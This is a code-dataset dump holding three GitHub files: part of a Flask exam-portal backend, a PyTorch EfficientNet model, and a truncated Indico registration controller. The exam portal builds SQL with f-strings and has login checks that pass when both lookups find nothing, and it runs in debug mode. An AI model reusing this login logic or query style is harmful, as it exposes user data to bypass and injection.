enrol=Students.query.filter_by(phone_number=phone_number).first()\r\n            phone=Students.query.filter_by(enrollment_number=enrollment_number).first()\r\n            if(enrol==phone):\r\n                auth=True\r\n            else:\r\n                auth=False\r\n        return jsonify({\"auth\":auth})\r\n\r\n####===========================STUDENT SECTION ENDS========================================================================================####\r\n\r\n#####===========================UPLOADING IMG TO AWS BUCKET=======================================#####\r\n\r\n# @app.route('/uploadimg', methods=['POST'])\r\n# def upload_file():\r\n#     file = request.files['file']\r\n#     s3 = boto3.client(\r\n#        \"s3\",\r\n#        aws_access_key_id=S3_KEY,\r\n#        aws_secret_access_key=S3_SECRET\r\n#     )\r\n#     s3.upload_fileobj(\r\n#         file,\r\n#         S3_BUCKET,\r\n#         file.filename,\r\n#         ExtraArgs={\r\n#             \"ContentType\": file.content_type\r\n#         }\r\n#     )\r\n#\r\n#     return \"{}{}\".format(S3_LOCATION, file.filename)\r\n\r\n#####===========================UPLOADING IMG TO AWS BUCKET ENDS=======================================#####\r\n\r\n\r\n@app.route(\"/marks/<enrollment_number>\", methods=[\"POST\", \"GET\"])\r\ndef marksadd(enrollment_number):\r\n    if request.method == \"POST\":\r\n        enrollment = request.json['enrollment']\r\n        examid = request.json[\"examid\"]\r\n        flag = checkifexists(examid, enrollment)\r\n        if (flag == True):\r\n            marks = request.json['marks']\r\n            appendDoc(marks, examid, str(enrollment_number))\r\n    else:\r\n        my_marks= fetch_marks(\"IEM@202318\", \"12021002019019\")\r\n        print(my_marks)\r\n        # my_marks= fetch_marks(examid, enrollment)\r\n        return jsonify({\"marks\": my_marks})\r\n    return \"Success\"\r\n\r\n\r\n@app.route(\"/createTest\", methods=[\"POST\", \"GET\"])\r\ndef create_test():\r\n    if request.method==\"POST\":\r\n        ExamName=request.json['ExamName']\r\n        SubjectCode= request.json['SubjectCode']\r\n        Session= request.json['Session']\r\n        Date= request.json['Date']\r\n        Starttime= request.json['StartTime']\r\n        semester= request.json['semester']\r\n        duration= request.json['duration']\r\n        # examstartDate= datetime.strptime(Date, \"%Y-%m-%d\")\r\n        # StartTime= datetime.strptime(Starttime, \"%H:%M\")\r\n        exams= 
Exams(exam_name=ExamName, subject_code=SubjectCode, exam_startdate= Date, exam_starttime=Starttime, exam_duration= duration, session= Session, semester=semester)\r\n\r\n with app.app_context():\r\n db.session.add(exams)\r\n db.session.commit()\r\n with app.app_context():\r\n q2 = Exams.query.filter_by(exam_name=ExamName).first()\r\n print(type(q2.examid))\r\n print(q2)\r\n id=q2.examid\r\n strid= str(id)\r\n todays= date.today()\r\n finalid= \"IEM@\"+ str(todays.year) + strid\r\n return jsonify({'examid': finalid})\r\n\r\n\r\n\r\n# @app.route(\"/startcheck\", methods=[\"POST\",\"GET\"])\r\n# def startcheck():\r\n# if request.method==\"POST\":\r\n# starttest=False\r\n# examid= request.json['examid']\r\n# with app.app_context():\r\n# time= f\"select exam_starttime from Exams where examid={examid}\"\r\n# date= f\"select exam_startdate from Exams where examid={examid}\"\r\n# dur= f\"select exam_duration from Exams where examid={examid}\"\r\n# nw=datetime.now()\r\n# currdate=nw.date()\r\n# currtime= nw.time()\r\n# if(currdate== date):\r\n# if(time>currtime):\r\n# starttest=True\r\n# if(starttest==True):\r\n# return jsonify({\"examid\": examid})\r\n\r\n@app.route('/addQ', methods=['POST','GET'])\r\ndef questions():\r\n if request.method=='POST':\r\n questionList = request.json['ExamPaper']\r\n insertDocument(questionList)\r\n return jsonify({'trigger':True})\r\n\r\n\r\n\r\n\r\n@app.route('/teachersignup', methods=[\"POST\", \"GET\"])\r\ndef teachersignup():\r\n if request.method==\"POST\":\r\n teacherid=request.json[\"teacherid\"]\r\n phonenumber=request.json[\"phone_number\"]\r\n email=request.json[\"email\"]\r\n name= request.json['name']\r\n addT=Teacher(teacherid=teacherid, phonenumber=phonenumber, email=email, name=name)\r\n with app.app_context():\r\n db.session.add(addT)\r\n db.session.commit()\r\n return jsonify({'teachername': name, 'auth':True})\r\n\r\n@app.route('/teacherlogin', methods=[\"POST\",\"GET\"])\r\ndef teacherlogin():\r\n if request.method==\"POST\":\r\n teacherid=str(request.json[\"teacherid\"])\r\n phonenumber=request.json[\"phonenumber\"]\r\n with app.app_context():\r\n tidcheck1 = Teacher.query.filter_by(phonenumber=str(phonenumber)).first()\r\n tidcheck2= Teacher.query.filter_by(teacherid=teacherid).first()\r\n if(tidcheck1==tidcheck2):\r\n auth=True\r\n jsonS=jsonify({\"auth\": auth})\r\n else:\r\n auth=False\r\n jsonS= jsonify({'auth': auth, 'error': 'Invalid Credentials'})\r\n\r\n return jsonS\r\n\r\n\r\n@app.route('/entercode', methods=[\"POST\", \"GET\"])\r\ndef enterexamcode():\r\n if request.method==\"POST\":\r\n examcode= request.json['examCode']\r\n enrollment= request.json['enrollment_number']\r\n code= examcode[8:]\r\n examCode= int(code)\r\n qpaper= readDocuments(str(examcode))\r\n qp=parse_json(qpaper)\r\n with app.app_context():\r\n q12=f\"select exam_duration from exams where examid={examCode}\"\r\n q13= f\"select exam_starttime from exams where examid={examCode}\"\r\n q14= f\"select exam_startdate from exams where examid={examCode}\"\r\n q01=db.engine.execute(q12)\r\n q02 = db.engine.execute(q13)\r\n q03 = db.engine.execute(q14)\r\n l=[]\r\n for i in q01:\r\n q2=i[0]\r\n l.append(int(q2))\r\n for i in q02:\r\n q3=i[0]\r\n l.append(q3)\r\n for i in q03:\r\n q4=i[0]\r\n l.append(q4)\r\n dur= q2*60*1000\r\n nw = datetime.now()\r\n currdate=nw.strftime(\"%Y-%m-%d\")\r\n currtime= nw.strftime(\"%H:%M:%S\")\r\n if(q4==currdate):\r\n diff= datetime.strptime(q3, \"%H:%M:%S\")-datetime.strptime(currtime, \"%H:%M:%S\")\r\n ms = diff.total_seconds() * 1000\r\n 
else:\r\n            datediff= datetime.strptime(q4, \"%Y-%m-%d\")- datetime.strptime(currdate, \"%Y-%m-%d\")\r\n            diff = datetime.strptime(q3, \"%H:%M:%S\")-datetime.strptime(currtime, \"%H:%M:%S\")\r\n            # timedelta addition: datediff already carries the whole days\r\n            totaldiff= datediff + diff\r\n            ms = totaldiff.total_seconds() * 1000\r\n\r\n        currtime0 = nw.strftime(\"%H:%M:%S\")\r\n        currtime1 = datetime.strptime(currtime0, \"%H:%M:%S\")\r\n        extime= datetime.strptime(q3, \"%H:%M:%S\")\r\n        if(extime>=currtime1):\r\n            flag=\"Positive\"\r\n        else:\r\n            flag=\"Negative\"\r\n        examchecker= checkifexists(examcode, enrollment)\r\n\r\n        return jsonify({\"questionpaper\": qp, \"remainingTime\": ms, \"duration\": dur, \"difference\": flag, \"eligibility\": examchecker})\r\n\r\n# @app.route('/markslenden', methods=[\"POST\",\"GET\"])\r\n# def marksexchanger():\r\n#     if request.method==\"POST\":\r\n#         enrollement_number= request.json['enrollment_number']\r\n#         examid= request.json['examid']\r\n#         marks= fetch_marks(examid, enrollement_number)\r\n#         return jsonify({\"marks\": marks})\r\n\r\ndef parse_json(data):\r\n    return json.loads(json_util.dumps(data))\r\n\r\n\r\n# with app.app_context():\r\n#     ExamName= \"Midsem 1 Digital Electronics\"\r\n#     q1 = f\"select examid from Exams where exam_name= {ExamName}\"\r\n#     q2 = Exams.query.filter_by(exam_name=ExamName).first()\r\n#     print(type(q2))\r\n#     print(q2)\r\n#     print(q2.examid)\r\n# nw= datetime.now()\r\n# currdate=nw.date()\r\n# currtime=nw.strftime(\"%Y-%m-%d\")\r\n# print(currdate)\r\n# print(currtime)\r\n# print(type(currtime))\r\n\r\n# with app.app_context():\r\n#     tim= \"9:00:30\"\r\n#     nw= datetime.now()\r\n#     currtime = nw.strftime(\"%H:%M:%S\")\r\n#     currtime1=datetime.strptime(currtime, \"%H:%M:%S\")\r\n#     tim1= datetime.strptime(tim, \"%H:%M:%S\")\r\n#     if(tim1>currtime1):\r\n#         print(\"YES\")\r\n#     else:\r\n#         print(\"NO\")\r\n\r\n@app.route('/')\r\ndef home():\r\n    return render_template('index.html')\r\n\r\n@app.route('/student/login')\r\ndef sLogin():\r\n    return render_template('index.html')\r\n\r\n@app.route('/teacher/login')\r\ndef tLogin():\r\n    return render_template('index.html')\r\n\r\n@app.route('/student')\r\ndef s():\r\n    return render_template('index.html')\r\n\r\n@app.route('/teacher')\r\ndef t():\r\n    return render_template('index.html')\r\n\r\n@app.route('/results/<enrollment>')\r\ndef r(enrollment):\r\n    return render_template('index.html')\r\n\r\n@app.route('/teacher/<examid>/addQuestion')\r\ndef qadd(examid):\r\n    return render_template('index.html')\r\n\r\nif __name__ == \"__main__\":\r\n    app.run(debug=True)", "repo_name": "Soham-Chakraborty-8455/Exam-Portal-Flask", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 13908, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 15, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 16, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 19, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", 
"line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "twilio.rest.Client", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "twilio.rest.Client", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 102, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 102, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 104, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 104, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 106, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 106, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 111, "usage_type": "call"}, {"api_name": "mongo.insertDocument", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 120, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 120, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 158, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 159, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 160, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 160, "usage_type": "name"}, {"api_name": "mongo.checkifexists", "line_number": 161, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 163, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 163, "usage_type": "name"}, {"api_name": "mongo.appendDoc", "line_number": 164, "usage_type": "call"}, {"api_name": "mongo.fetch_marks", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 175, "usage_type": "attribute"}, {"api_name": 
"flask.request", "line_number": 175, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 176, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 176, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 177, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 177, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 178, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 178, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 179, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 179, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 180, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 180, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 181, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 181, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 196, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 196, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 198, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 222, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 222, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 223, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 223, "usage_type": "name"}, {"api_name": "mongo.insertDocument", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 232, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 232, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 233, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 233, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 234, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 234, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 235, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 235, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 236, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 236, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 241, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 245, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 245, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 246, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 246, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 253, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 256, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 263, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 263, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 264, "usage_type": 
"attribute"}, {"api_name": "flask.request", "line_number": 264, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 265, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 265, "usage_type": "name"}, {"api_name": "mongo.readDocuments", "line_number": 268, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 288, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 288, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 292, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 292, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 295, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 295, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 296, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 296, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 301, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 301, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 302, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 302, "usage_type": "name"}, {"api_name": "mongo.checkifexists", "line_number": 307, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 309, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 320, "usage_type": "call"}, {"api_name": "bson.json_util.dumps", "line_number": 320, "usage_type": "call"}, {"api_name": "bson.json_util", "line_number": 320, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 350, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 354, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 358, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 362, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 366, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 370, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 374, "usage_type": "call"}]}
+{"seq_id": "20120934463", "text": "# -*- coding: utf-8 -*-\n\nimport torch\nfrom torch import nn\nfrom math import ceil\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom . import BaseBlocks as bb\n\nclass EfficientNet(nn.Module):\n def __init__(self, scale_width=1, scale_depth=1, drop_rate = 0.2, output_size=1000):\n super(EfficientNet, self).__init__()\n base_widths=[\n {\n \"in_dim\":32,\n \"out_dim\":16\n },\n {\n \"in_dim\":16,\n \"out_dim\":24\n },\n {\n \"in_dim\":24,\n \"out_dim\":40\n },\n {\n \"in_dim\":40,\n \"out_dim\":80\n },\n {\n \"in_dim\":80,\n \"out_dim\":112\n },\n {\n \"in_dim\":112,\n \"out_dim\":192\n },\n {\n \"in_dim\":192,\n \"out_dim\":320\n },\n {\n \"in_dim\":320,\n \"out_dim\":1280\n }\n ]\n base_depths = [1,2,2,3,3,4,1]\n kernels = [3,3,5,3,5,5,3]\n strides = [1,2,2,2,1,2,1]\n self.drop_rate = drop_rate\n scaled_widths = []\n for i in range(len(base_widths)):\n scaled_widths.append((self.do_scale_width(base_widths[i][\"in_dim\"], scale_width), self.do_scale_width(base_widths[i][\"out_dim\"], scale_width)))\n scaled_depths = [ceil(scale_depth*d) for d in base_depths]\n drop_rates = np.linspace(self.drop_rate/sum(scaled_depths), self.drop_rate, sum(scaled_depths))\n \n self.pre = bb.ConvBlock(3, scaled_widths[0][0], kernel_size=3, stride=2, padding=1)\n mbconv_layers = []\n count=0\n for i in range(7):\n d = scaled_depths[i]\n mb_type=6\n r=24\n if i ==0:\n mb_type=1\n r=4\n lays = [bb.MBConvBlock(scaled_widths[i][0], scaled_widths[i][1], kernel_size=kernels[i], stride= strides[i], drop_prob=drop_rates[i], mb_type=mb_type, r_factor=r)]\n count+=1\n for j in range(d-1):\n lays.append(bb.MBConvBlock(scaled_widths[i][1], scaled_widths[i][1], kernel_size=kernels[i], stride= 1, drop_prob=drop_rates[count], mb_type=mb_type, r_factor=r))\n count+=1\n mbconv_layers.append(nn.Sequential(*lays))\n mbconv_layers.append(bb.ConvBlock(scaled_widths[7][0], scaled_widths[7][1], kernel_size=1, stride=1, padding=0))\n self.mbconv_layers = nn.Sequential(*mbconv_layers)\n self.head = nn.Sequential(nn.AdaptiveAvgPool2d(1),\n nn.Flatten(),\n nn.Linear(scaled_widths[-1][1], output_size))\n \n def do_scale_width(self, w, scale_factor):\n w *= scale_factor\n new_w = (int(w+4) // 8) * 8\n new_w = max(8, new_w)\n if new_w < 0.9*w:\n new_w += 8\n return int(new_w)\n \n def forward(self, x):\n x = self.pre(x)\n x = self.mbconv_layers(x)\n x = self.head(x)\n return F.log_softmax(x, dim=1)", "repo_name": "joempappas/efficientnet", "sub_path": "Nets/EfficientNet.py", "file_name": "EfficientNet.py", "file_ext": "py", "file_size_in_byte": 3131, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn.Flatten", 
"line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 92, "usage_type": "name"}]}
+{"seq_id": "73342142487", "text": "from flask import jsonify, request, session\nfrom werkzeug.exceptions import BadRequest\n\nfrom indico.core.db import db\nfrom indico.modules.events.registration import logger\nfrom indico.modules.events.registration.controllers.management import RHManageRegFormBase\nfrom indico.modules.events.registration.models.items import RegistrationFormItemType, RegistrationFormSection\nfrom indico.modules.events.registration.util import get_flat_section_positions_setup_data, update_regform_item_positions\nfrom indico.modules.logs.models.entries import EventLogRealm, LogKind\nfrom indico.modules.logs.util import make_diff_log\nfrom indico.web.util import jsonify_data\n\n\nclass RHManageRegFormSectionBase(RHManageRegFormBase):\n \"\"\"Base class for a specific registration form section.\"\"\"\n\n normalize_url_spec = {\n 'locators': {\n lambda self: self.section\n }\n }\n\n def _process_args(self):\n RHManageRegFormBase._process_args(self)\n self.section = RegistrationFormSection.get_or_404(request.view_args['section_id'])\n\n\nclass RHRegistrationFormAddSection(RHManageRegFormBase):\n \"\"\"Add a section to the registration form.\"\"\"\n\n def _process(self):\n section = RegistrationFormSection(registration_form=self.regform)\n section.title = request.json['title']\n section.description = request.json.get('description')\n section.is_manager_only = request.json.get('is_manager_only', False)\n db.session.add(section)\n db.session.flush()\n section.log(\n EventLogRealm.management, LogKind.positive, 'Registration',\n f'Section \"{section.title}\" in \"{self.regform.title}\" added', session.user,\n data={'Manager-only': section.is_manager_only}\n )\n logger.info('Section %s created by %s', section, session.user)\n return jsonify(section.view_data)\n\n\nclass RHRegistrationFormModifySection(RHManageRegFormSectionBase):\n \"\"\"Delete/modify a section.\"\"\"\n\n def _process_DELETE(self):\n if self.section.type == RegistrationFormItemType.section_pd:\n raise BadRequest\n self.section.is_deleted = True\n db.session.flush()\n self.section.log(\n EventLogRealm.management, LogKind.negative, 'Registration',\n f'Section \"{self.section.title}\" in \"{self.regform.title}\" deleted', session.user\n )\n logger.info('Section %s deleted by %s', self.section, session.user)\n return jsonify(success=True)\n\n def _process_PATCH(self):\n changes = request.json['changes']\n if set(changes.keys()) > {'title', 'description', 'is_manager_only'}:\n raise BadRequest\n if self.section.type == RegistrationFormItemType.section_pd and changes.get('is_manager_only'):\n raise BadRequest\n changes = self.section.populate_from_dict(changes)\n db.session.flush()\n changes = make_diff_log(changes, {\n 'title': {'title': 'Title', 'type': 'string'},\n 'description': {'title': 'Description'},\n 'is_manager_only': {'title': 'Manager-only'},\n })\n self.section.log(\n EventLogRealm.management, LogKind.change, 'Registration',\n f'Section \"{self.section.title}\" in \"{self.regform.title}\" modified', session.user,\n data={'Changes': changes}\n )\n logger.info('Section %s modified by %s: %s', self.section, session.user, changes)\n return jsonify(self.section.view_data)\n\n\nclass RHRegistrationFormToggleSection(RHManageRegFormSectionBase):\n \"\"\"Enable/disable a section.\"\"\"\n\n def _process_POST(self):\n enabled = request.args.get('enable') == 'true'\n if not enabled and self.section.type == RegistrationFormItemType.section_pd:\n raise BadRequest\n self.section.is_enabled = enabled\n 
update_regform_item_positions(self.regform)\n db.session.flush()\n if self.section.is_enabled:\n self.section.log(\n EventLogRealm.management, LogKind.positive, 'Registration',\n f'Section \"{self.section.title}\" in \"{self.regform.title}\" enabled', session.user\n )\n logger.info('Section %s enabled by %s', self.section, session.user)\n else:\n self.section.log(\n EventLogRealm.management, LogKind.negative, 'Registration',\n f'Section \"{self.section.title}\" in \"{self.regform.title}\" disabled', session.user\n )\n logger.info('Section %s disabled by %s', self.section, session.user)\n return jsonify_data(view_data=self.section.view_data,\n positions=get_flat_section_positions_setup_data(self.regform))\n\n\nclass RHRegistrationFormMoveSection(RHManageRegFormSectionBase):\n \"\"\"Move a section within the registration form.\"\"\"\n\n def _process(self):\n new_position = request.json['endPos'] + 1\n old_position = self.section.position\n if new_position == old_position:\n return jsonify(success=True)\n elif new_position < old_position:\n def fn(section):\n return (section.position >= new_position and section.id != self.section.id and not section.is_deleted\n and section.is_enabled)\n start_enum = new_position + 1\n else:\n def fn(section):\n return (old_position < section.position <= new_position and section.id != self.section.id\n and not section.is_deleted and section.is_enabled)\n start_enum = self.section.position\n to_update = list(filter(fn,\n RegistrationFormSection.query\n .filter_by(registration_form=self.regform, is_deleted=False)\n .order_by(RegistrationFormSection.position)\n .all()))\n self.section.position = new_position\n for pos, section in enumerate(to_update, start_enum):\n section.position = pos\n db.session.flush()\n return jsonify(success=True)\n", "repo_name": "indico/indico", "sub_path": "indico/modules/events/registration/controllers/management/sections.py", "file_name": "sections.py", "file_ext": "py", "file_size_in_byte": 6092, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1560, "dataset": "github-code", "pt": "31", "api": [{"api_name": "indico.modules.events.registration.controllers.management.RHManageRegFormBase", "line_number": 14, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.controllers.management.RHManageRegFormBase._process_args", "line_number": 24, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.controllers.management.RHManageRegFormBase", "line_number": 24, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection.get_or_404", "line_number": 25, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.view_args", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.controllers.management.RHManageRegFormBase", "line_number": 28, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 34, "usage_type": "attribute"}, 
{"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "indico.core.db.db.session.add", "line_number": 36, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 36, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 36, "usage_type": "name"}, {"api_name": "indico.core.db.db.session.flush", "line_number": 37, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 37, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 37, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm.management", "line_number": 39, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm", "line_number": 39, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.LogKind.positive", "line_number": 39, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.LogKind", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.logger.info", "line_number": 43, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.logger", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 44, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType.section_pd", "line_number": 51, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType", "line_number": 51, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.BadRequest", "line_number": 52, "usage_type": "name"}, {"api_name": "indico.core.db.db.session.flush", "line_number": 54, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 54, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 54, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm.management", "line_number": 56, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm", "line_number": 56, "usage_type": "name"}, {"api_name": 